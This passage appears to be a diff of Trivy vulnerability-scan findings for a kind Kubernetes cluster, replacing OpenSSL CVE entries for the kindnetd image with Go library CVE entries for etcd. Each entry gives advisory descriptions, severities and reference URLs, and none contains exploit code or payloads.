"https://access.redhat.com/errata/RHSA-2023:2357", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", + "value": "https://access.redhat.com/security/cve/CVE-2022-27664", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "value": "https://bugzilla.redhat.com/2107371", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "value": "https://bugzilla.redhat.com/2107374", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "value": "https://bugzilla.redhat.com/2107383", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "value": "https://bugzilla.redhat.com/2107386", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "value": "https://bugzilla.redhat.com/2107388", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "value": "https://bugzilla.redhat.com/2113814", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "value": "https://bugzilla.redhat.com/2124669", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "value": "https://bugzilla.redhat.com/2132868", }, { "type": "URL", - "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "value": "https://bugzilla.redhat.com/2132872", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2021:4513", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", }, { "type": "URL", - "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-36087.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", }, { "type": "URL", - "value": "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5391-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-36087", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "1.1.1d-0+deb10u7", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3711", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", - "references": [ - "http://www.openwall.com/lists/oss-security/2021/08/26/2", - "https://access.redhat.com/security/cve/CVE-2021-3711", - "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3711", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=59f5e75f3bced8fc0e130d72a3f582cf7b480b46", - "https://github.com/advisories/GHSA-5ww6-px42-wc85", - "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", - "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3711", - "https://rustsec.org/advisories/RUSTSEC-2021-0097.html", - "https://security.gentoo.org/glsa/202209-02", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20210827-0010/", - "https://security.netapp.com/advisory/ntap-20211022-0003/", - "https://ubuntu.com/security/notices/USN-5051-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3711", - "https://www.debian.org/security/2021/dsa-4963", - "https://www.openssl.org/news/secadv/20210824.txt", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujan2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-16", - "https://www.tenable.com/security/tns-2022-02", - ], - }, - "category": "Vulnerability", - "description": "In order to decrypt SM2 encrypted data an application is expected to call the API function EVP_PKEY_decrypt(). Typically an application will call this function twice. The first time, on entry, the "out" parameter can be NULL and, on exit, the "outlen" parameter is populated with the buffer size required to hold the decrypted plaintext. The application can then allocate a sufficiently sized buffer and call EVP_PKEY_decrypt() again, but this time passing a non-NULL value for the "out" parameter. A bug in the implementation of the SM2 decryption code means that the calculation of the buffer size required to hold the plaintext returned by the first call to EVP_PKEY_decrypt() can be smaller than the actual size required by the second call. This can lead to a buffer overflow when EVP_PKEY_decrypt() is called by the application a second time with a buffer that is too small. A malicious attacker who is able present SM2 content for decryption to an application could cause attacker chosen data to overflow the buffer by up to a maximum of 62 bytes altering the contents of other data held after the buffer, possibly changing application behaviour or causing the application to crash. The location of the buffer is application dependent but is typically heap allocated. Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "openssl: SM2 Decryption Buffer Overflow", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3711", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/26/2", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3711", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3711", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=59f5e75f3bced8fc0e130d72a3f582cf7b480b46", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-5ww6-px42-wc85", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3711", + "value": "https://errata.almalinux.org/9/ALSA-2023-2357.html", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0097.html", + "value": "https://errata.rockylinux.org/RLSA-2022:7129", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202209-02", + "value": "https://github.com/advisories/GHSA-69cg-p879-7622", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210827-0010/", + "value": "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20211022-0003/", + "value": "https://github.com/golang/go/issues/54658", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5051-1", + "value": "https://go.dev/cl/428735", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3711", + "value": "https://go.dev/issue/54658", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4963", + "value": "https://groups.google.com/g/golang-announce", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210824.txt", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujan2022.html", + "value": "https://linux.oracle.com/cve/CVE-2022-27664.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://linux.oracle.com/errata/ELSA-2023-2802.html", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-16", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2022-02", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2022-0969", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202209-26", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20220923-0004/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6038-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-27664", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb10u2", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1292", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", + "fixedVersion": "0.7.0", + "foundIn": "Target: 'usr/local/bin/etcd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41723", + "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/errata/RHSA-2022:6224", - "https://access.redhat.com/security/cve/CVE-2022-1292", - "https://bugzilla.redhat.com/2081494", - "https://bugzilla.redhat.com/2087911", - "https://bugzilla.redhat.com/2087913", - "https://bugzilla.redhat.com/2097310", - "https://bugzilla.redhat.com/2104905", - "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", - "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", - "https://cert-portal.siemens.com/productcert/pdf/ssa-953464.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", - "https://errata.almalinux.org/9/ALSA-2022-6224.html", - "https://errata.rockylinux.org/RLSA-2022:5818", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1ad73b4d27bd8c1b369a3cd453681d3a4f1bb9b2", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=548d3f280a6e737673f5b61fce24bb100108dfeb", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e5fd1728ef4c7a5bf7c7a7163ca60370460a6e23", - "https://linux.oracle.com/cve/CVE-2022-1292.html", - "https://linux.oracle.com/errata/ELSA-2022-9751.html", - "https://lists.debian.org/debian-lts-announce/2022/05/msg00019.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VX4KWHPMKYJL6ZLW4M5IU7E5UV5ZWJQU/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNU5M7BXMML26G3GPYKFGQYPQDRSNKDD/", - "https://mta.openssl.org/pipermail/openssl-announce/2022-May/000224.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1292", - "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0011", - "https://security.gentoo.org/glsa/202210-02", - "https://security.netapp.com/advisory/ntap-20220602-0009/", - "https://security.netapp.com/advisory/ntap-20220729-0004/", - "https://ubuntu.com/security/notices/USN-5402-1", - "https://ubuntu.com/security/notices/USN-5402-2", - "https://www.cve.org/CVERecord?id=CVE-2022-1292", - "https://www.debian.org/security/2022/dsa-5139", - "https://www.openssl.org/news/secadv/20220503.txt", - "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://access.redhat.com/security/cve/CVE-2022-41723", + "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", + "https://go.dev/cl/468135", + "https://go.dev/cl/468295", + "https://go.dev/issue/57855", + "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", + "https://pkg.go.dev/vuln/GO-2023-1571", + "https://vuln.go.dev/ID/GO-2023-1571.json", + "https://www.cve.org/CVERecord?id=CVE-2022-41723", ], }, "category": "Vulnerability", - "description": "The c_rehash script does not properly sanitise shell metacharacters to prevent command injection. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2). Fixed in OpenSSL 1.1.1o (Affected 1.1.1-1.1.1n). Fixed in OpenSSL 1.0.2ze (Affected 1.0.2-1.0.2zd).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A maliciously crafted HTTP/2 stream could cause excessive CPU consumption in the HPACK decoder, sufficient to cause a denial of service from a small number of small requests.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "c_rehash script allows command injection", + "name": "avoid quadratic complexity in HPACK decoding", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1292", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6224", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1292", + "value": "https://avd.aquasec.com/nvd/cve-2022-41723", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2081494", + "value": "https://access.redhat.com/security/cve/CVE-2022-41723", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2087911", + "value": "https://github.com/advisories/GHSA-vvpx-j8f3-3w6h", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2087913", + "value": "https://go.dev/cl/468135", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2097310", + "value": "https://go.dev/cl/468295", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2104905", + "value": "https://go.dev/issue/57855", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "value": "https://groups.google.com/g/golang-announce/c/V0aBFqaFs_E", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MA5XS5DAOJ5PKKNG5TUXKPQOFHT5VBC/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGW7GE2Z32ZT47UFAQFDRQE33B7Q7LMT/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RLBQ3A7ROLEQXQLXFDLNJ7MYPKG5GULE/", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-953464.pdf", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XX3IMUTZKRQ73PBZM4E2JP4BKYH4C6XE/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41723", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "value": "https://pkg.go.dev/vuln/GO-2023-1571", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "value": "https://vuln.go.dev/ID/GO-2023-1571.json", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41723", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "0.4.0", + "foundIn": "Target: 'usr/local/bin/etcd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-41717", + "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", + "packageName": "golang.org/x/net", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:2367", + "https://access.redhat.com/security/cve/CVE-2022-41717", + "https://bugzilla.redhat.com/2092793", + "https://bugzilla.redhat.com/2161274", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "https://go.dev/cl/455635", + "https://go.dev/cl/455717", + "https://go.dev/issue/56350", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-41717.html", + "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "https://pkg.go.dev/vuln/GO-2022-1144", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-41717", + ], + }, + "category": "Vulnerability", + "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "mitigation": undefined, + "name": "excessive memory growth in a Go server accepting HTTP/2 requests", + "references": [ { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:5818", + "value": "https://avd.aquasec.com/nvd/cve-2022-41717", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=1ad73b4d27bd8c1b369a3cd453681d3a4f1bb9b2", + "value": "https://access.redhat.com/errata/RHSA-2023:2367", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=548d3f280a6e737673f5b61fce24bb100108dfeb", + "value": "https://access.redhat.com/security/cve/CVE-2022-41717", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e5fd1728ef4c7a5bf7c7a7163ca60370460a6e23", + "value": "https://bugzilla.redhat.com/2092793", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1292.html", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00019.html", + "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VX4KWHPMKYJL6ZLW4M5IU7E5UV5ZWJQU/", + "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZNU5M7BXMML26G3GPYKFGQYPQDRSNKDD/", + "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", }, { "type": "URL", - "value": "https://mta.openssl.org/pipermail/openssl-announce/2022-May/000224.html", + "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1292", + "value": "https://go.dev/cl/455635", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0011", + "value": "https://go.dev/cl/455717", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-02", + "value": "https://go.dev/issue/56350", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220602-0009/", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0004/", + "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5402-1", + "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5402-2", + "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1292", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5139", + "value": "https://pkg.go.dev/vuln/GO-2022-1144", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20220503.txt", + "value": "https://ubuntu.com/security/notices/USN-6038-1", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb10u3", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-2068", - "installedVersion": "1.1.1d-0+deb10u4", - "packageName": "libssl1.1", + "fixedVersion": "0.0.0-20220412211240-33da011f77ad", + "foundIn": "Target: 'usr/local/bin/etcd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-29526", + "installedVersion": "v0.0.0-20210615035016-665e8c7367d1", + "packageName": "golang.org/x/sys", "references": [ - "https://access.redhat.com/errata/RHSA-2022:6224", - "https://access.redhat.com/security/cve/CVE-2022-2068", - "https://bugzilla.redhat.com/2081494", - "https://bugzilla.redhat.com/2087911", - "https://bugzilla.redhat.com/2087913", - "https://bugzilla.redhat.com/2097310", - "https://bugzilla.redhat.com/2104905", - "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", - "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", - "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", - "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", - "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", - "https://errata.almalinux.org/9/ALSA-2022-6224.html", - "https://errata.rockylinux.org/RLSA-2022:5818", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c9c35870601b4a44d86ddbf512b38df38285cfa", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=7a9c027159fe9e1bbc2cd38a8a2914bff0d5abd9", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9639817dac8bbbaa64d09efad7464ccc405527c7", - "https://linux.oracle.com/cve/CVE-2022-2068.html", - "https://linux.oracle.com/errata/ELSA-2022-9751.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/6WZZBKUHQFGSKGNXXKICSRPL7AMVW5M5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-2068", - "https://security.netapp.com/advisory/ntap-20220707-0008/", - "https://ubuntu.com/security/notices/USN-5488-1", - "https://ubuntu.com/security/notices/USN-5488-2", - "https://www.cve.org/CVERecord?id=CVE-2022-2068", - "https://www.debian.org/security/2022/dsa-5169", - "https://www.openssl.org/news/secadv/20220621.txt", + "https://access.redhat.com/security/cve/CVE-2022-29526", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", + "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "https://github.com/golang/go/issues/52313", + "https://go.dev/cl/399539", + "https://go.dev/cl/400074", + "https://go.dev/issue/52313", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "https://linux.oracle.com/cve/CVE-2022-29526.html", + "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "https://pkg.go.dev/vuln/GO-2022-0493", + "https://security.gentoo.org/glsa/202208-02", + "https://security.netapp.com/advisory/ntap-20220729-0001/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-29526", ], }, "category": "Vulnerability", - "description": "In addition to the c_rehash shell command injection identified in CVE-2022-1292, further circumstances where the c_rehash script does not properly sanitise shell metacharacters to prevent command injection were found by code review. When the CVE-2022-1292 was fixed it was not discovered that there are other places in the script where the file names of certificates being hashed were possibly passed to a command executed through the shell. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.4 (Affected 3.0.0,3.0.1,3.0.2,3.0.3). Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o). Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", "mitigation": undefined, - "name": "the c_rehash script allows command injection", + "name": "faccessat checks wrong group", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-2068", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:6224", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-2068", - }, - { - "type": "URL", - "value": 